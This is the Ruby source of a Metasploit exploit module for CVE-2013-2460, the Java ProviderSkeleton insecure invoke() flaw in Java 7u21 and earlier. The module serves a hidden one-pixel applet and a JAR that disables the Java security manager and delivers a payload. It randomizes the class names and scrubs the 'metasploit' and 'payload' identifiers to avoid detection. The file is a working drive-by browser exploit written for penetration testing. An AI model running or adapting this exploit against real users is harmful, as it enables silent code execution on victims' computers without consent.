##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Great rather than Excellent: no click-to-play bypass is available, and
  # current JREs ship with Java Security Level "High" by default.
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ javascript: false })

  # Class name compiled into the pre-built Exploit.class. It is swapped for a
  # random alphabetic string of the same length in +setup+ (see note there).
  EXPLOIT_STRING = 'Exploit'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method',
        'Description' => %q{
          This module abuses the insecure invoke() method of the ProviderSkeleton class that
          allows to call arbitrary static methods with user supplied arguments. The vulnerability
          affects Java version 7u21 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC
          'Matthias Kaiser' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-2460' ],
          [ 'OSVDB', '94346' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
        ],
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-06-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Replaces every occurrence of +identifier+ in the name and in the raw
  # contents of each +jar+ entry with one random alphabetic string.
  #
  # The replacement has exactly the same length as +identifier+, so no byte
  # offset inside the rewritten entry data moves; only the identifier text
  # itself changes.
  #
  # @param jar [Rex::Zip::Jar] archive whose entries are rewritten in place
  # @param identifier [String] literal (not a regexp) to scrub from the entries
  def randomize_identifier_in_jar(jar, identifier)
    replacement = rand_text_alpha(identifier.length)
    jar.entries.each do |entry|
      entry.name.gsub!(identifier, replacement)
      entry.data = entry.data.gsub(identifier, replacement)
    end
  end

  # Loads the three pre-compiled helper classes from the framework data
  # directory and randomizes the applet entry class name before +super+
  # brings up the HTTP server.
  def setup
    @exploit_class = load_class_file('Exploit.class')
    @provider_class = load_class_file('ExpProvider.class')
    @action_class = load_class_file('DisableSecurityManagerAction.class')

    # Same-length substitution: the class file is patched as raw bytes, so the
    # new name must not change the size of anything around it.
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
    @exploit_class = @exploit_class.gsub(EXPLOIT_STRING, @exploit_class_name)

    super
  end

  # HTTP dispatcher for the exploit resource.
  #
  # * a URI ending in ".jar" (any name) is answered with a freshly built
  #   exploit JAR as application/octet-stream;
  # * a URI ending in "/" regenerates the payload for this client and, on
  #   success, serves the applet page (404 when generation fails);
  # * anything else is redirected to the resource root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_exploit_jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/$}
      unless regenerate_payload(cli)
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the one-pixel applet page. The archive name is random; because
  # on_request_uri serves any URI ending in ".jar", only the extension matters.
  #
  # @return [String] HTML document embedding the randomized applet class
  def generate_html
    archive_name = "#{rand_text_alpha(rand(3..7))}.jar"
    %(
      <html>
      <body>
      <applet archive="#{archive_name}" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
      </body>
      </html>
    )
  end

  private

  # Reads one pre-compiled class file from data/exploits/cve-2013-2460 as
  # raw bytes.
  #
  # @param name [String] file name inside the cve-2013-2460 data directory
  # @return [String] binary class file contents
  def load_class_file(name)
    File.binread(File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-2460', name))
  end

  # Wraps the encoded Java payload together with the three helper classes
  # into one JAR, scrubs the well-known "metasploit" and "payload"
  # identifiers from every entry, and finalizes the manifest.
  #
  # @return [Rex::Zip::Jar] archive ready to be sent to the browser
  def build_exploit_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file('ExpProvider.class', @provider_class)
    jar.add_file('DisableSecurityManagerAction.class', @action_class)
    %w[metasploit payload].each { |ident| randomize_identifier_in_jar(jar, ident) }
    jar.build_manifest
    jar
  end
end